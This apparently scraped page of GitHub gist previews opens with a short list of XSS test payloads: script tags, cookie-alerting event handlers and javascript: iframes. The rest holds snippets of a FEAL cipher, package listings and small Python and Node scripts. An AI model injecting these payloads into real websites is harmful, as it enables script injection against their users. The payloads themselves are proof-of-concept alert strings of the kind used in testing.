'';!--"<XSS>=&{()}``\"
<script>alert(XSS);</script>
"><script>alert(XSS);</script>
<ScrIpt>alert(1);</SCript>
<a onmouseover="alert(document.cookie)">XSS</a>
<a onmouseover=alert(document.cookie)>XSS</a>
<<script>alert("XSS");//<</script>
<iframe src="javascript:alert('XSS');"></iframe>
<iframe src=# onmouseover="alert(document.cookie)"></iframe>
- ``
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import java.util.Arrays; | |
import edu.rit.util.Hex; | |
import edu.rit.util.Packing; | |
public class FEALCipher implements BlockCipher { | |
//Set up parameters and default values | |
public int R = 8; | |
byte deltaParam = 0; | |
int numOfSubKeys = (this.R + 8); | |
short[] subKey = new short[numOfSubKeys]; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var Zip = require('node-7z'); | |
var async = require('async'); | |
var fs = require('fs'); | |
var archive = new Zip(); | |
// Polyfill String.prototype.endsWith | |
if (!String.prototype.endsWith) { | |
Object.defineProperty(String.prototype, 'endsWith', { | |
enumerable: false, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
C:\Users\hakatashi>choco list -lo | |
7zip 9.22.01.20130618 | |
7zip.commandline 9.20.0.20130618 | |
7zip.install 9.22.01.20130618 | |
AdobeAIR 15.0.0.249 | |
adobereader 11.0.09.20140925 | |
android-sdk 24.0.2 | |
arduinoide 1.0.5.20140625 | |
Atom 0.153.0 | |
audacity 2.0.6 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from PIL import Image | |
omote = Image.open('omote.png', 'r') | |
ura = Image.open('ura.png', 'r') | |
dest = Image.new('RGBA', omote.size) | |
(width, height) = omote.size | |
for x in range(width): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hakatashi@HAKATAPAD C:\Users\hakatashi | |
$ choco list -lo | |
Chocolatey v0.9.9.5 | |
7zip 9.22.01.20130618 | |
7zip.commandline 9.20.0.20130618 | |
7zip.install 9.22.01.20130618 | |
AdobeAIR 15.0.0.249 | |
adobereader 11.0.10 | |
android-sdk 24.0.2 | |
arduinoide 1.6.1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[36mBuilt-in Atom packages[39m (85) | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] | |
├── [email protected] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Simulate the solar irradiance from the earth | |
import numpy as np | |
from scipy.constants import * | |
# Prompt Solar Temperature (ideally around 5800K) | |
T = int(input('Temperature? ')) | |
# Constants | |
Rsun = 6.96e8 # Solar radius (m) |